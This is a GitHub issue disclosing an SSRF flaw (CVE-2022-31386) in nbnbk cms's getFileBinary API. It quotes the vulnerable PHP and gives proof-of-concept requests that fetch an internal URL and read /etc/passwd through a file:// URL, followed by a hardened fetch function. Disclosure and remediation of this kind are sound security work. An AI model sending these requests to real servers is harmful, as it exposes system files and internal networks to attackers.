
[Vuln] SSRF vulnerability in getFileBinary Function #5

Closed
zer0yu opened this issue May 19, 2022 · 2 comments

Comments


zer0yu commented May 19, 2022

A Server-Side Request Forgery (SSRF) in the getFileBinary function of nbnbk cms allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.

Vulnerable code in /application/api/controller/Index.php

    /**
     * Convert a file to a Base64 binary stream
     * @param $url network file path, absolute address
     * @return string
     */
    public function getFileBinary()
    {
        $str = file_get_contents($_REQUEST['url']);
        Util::echo_json(ReturnData::create(ReturnData::SUCCESS,chunk_split(base64_encode($str))));
    }

Vulnerability PoC

GET /api/Index/getFileBinary?url=http://172.16.119.1:8181/flag.txt HTTP/1.1
Host: 172.16.119.130
Connection: close

The effect of the exploit is shown in the following figure. A remote attacker can force the application to make arbitrary requests via the injection of arbitrary URLs into the url parameter.

[image: effect of the exploit]

A remote attacker can also read arbitrary file information from the target system.

PoC

GET /api/Index/getFileBinary?url=file:///etc/passwd HTTP/1.1
Host: 172.16.119.130
Connection: close

[image]

After decoding the data field of the HTTP response body in base64, you can get the specific content of the file (/etc/passwd).

[image: decoded content of /etc/passwd]
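The root cause is that `file_get_contents()` is handed a caller-controlled URL with no restriction on scheme or destination, so both the internal-network request and the `file://` read above go through. The following is an added example of a hardened replacement for that fetch; it is not code from nbnbk cms, and the helper names (`resolvePublicIpv4`, `fetchPublicUrl`, `encodeFileBinary`) and the 5 MiB size cap are assumptions chosen for illustration. It allows only plain `http`/`https`, resolves the host itself and rejects any answer in a private, loopback, link-local or reserved range, then pins the libcurl connection to the address it validated so a later DNS answer cannot swap in an internal host, and it does not follow redirects.

```php
<?php
// Added example, not code from nbnbk cms: a hardened replacement for the
// fetch inside getFileBinary(). Helper names and the 5 MiB cap are assumptions.

// Resolve $host to IPv4 and return one address, or null if the host is
// unresolvable or any answer falls in a private, loopback, link-local or
// otherwise reserved block. A host with no A record is rejected outright,
// which also rejects bracketed IPv6 literals such as "[::1]".
function resolvePublicIpv4(string $host): ?string
{
    if (filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
        $ips = [$host];
    } else {
        $records = @dns_get_record($host, DNS_A);
        if ($records === false) {
            return null;
        }
        $ips = array_values(array_filter(array_column($records, 'ip')));
    }
    if ($ips === []) {
        return null;
    }
    foreach ($ips as $ip) {
        // NO_PRIV_RANGE rejects RFC 1918 space; NO_RES_RANGE rejects 0/8, 127/8,
        // 169.254/16 (which includes cloud metadata endpoints) and 240/4.
        $ok = filter_var($ip, FILTER_VALIDATE_IP,
            FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
        if ($ok === false) {
            return null;
        }
    }
    return $ips[0];
}

// Fetch $url only if it is plain http(s) to a public host. The connection is
// pinned to the address that was validated, so libcurl's own lookup cannot be
// answered differently (DNS rebinding), and redirects are never followed.
function fetchPublicUrl(string $url, int $maxBytes = 5 * 1024 * 1024): ?string
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])
        || isset($p['user']) || isset($p['pass'])) {
        return null;
    }
    $scheme = strtolower($p['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;                       // drops file://, gopher://, php:// ...
    }
    $ip = resolvePublicIpv4($p['host']);
    if ($ip === null) {
        return null;
    }
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_FOLLOWLOCATION  => false,
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE         => ["{$p['host']}:{$port}:{$ip}"],
        CURLOPT_CONNECTTIMEOUT  => 5,
        CURLOPT_TIMEOUT         => 15,
        CURLOPT_MAXFILESIZE     => $maxBytes,
    ]);
    $body   = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);

    return ($body === false || $status !== 200) ? null : $body;
}

// Drop-in for the body of getFileBinary(): returns the chunked base64 string
// the original endpoint emitted, or null when the URL is rejected, so the
// controller can report an error instead of performing the fetch.
function encodeFileBinary(string $url): ?string
{
    $str = fetchPublicUrl($url);
    return $str === null ? null : chunk_split(base64_encode($str));
}

// Usage inside the controller: $out = encodeFileBinary((string)($_REQUEST['url'] ?? ''));
// and emit an error response when $out is null.
```

Two caveats apply. The PHP filter flags do not cover every block a deployment may consider internal (for example 100.64.0.0/10 or a VPN range), so an explicit deny list, or better an allowlist of the hosts this feature is actually meant to fetch from, plus an egress firewall on the application host, are the stronger controls. `CURLOPT_MAXFILESIZE` only stops transfers whose declared Content-Length exceeds the cap; a progress callback or a read limit is needed if chunked responses must be bounded as well.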


fgeek commented Jun 11, 2022

CVE-2022-31386 has been assigned for this vulnerability.


zer0yu commented Jun 16, 2022

thx, bro

zer0yu closed this as completed Jun 16, 2022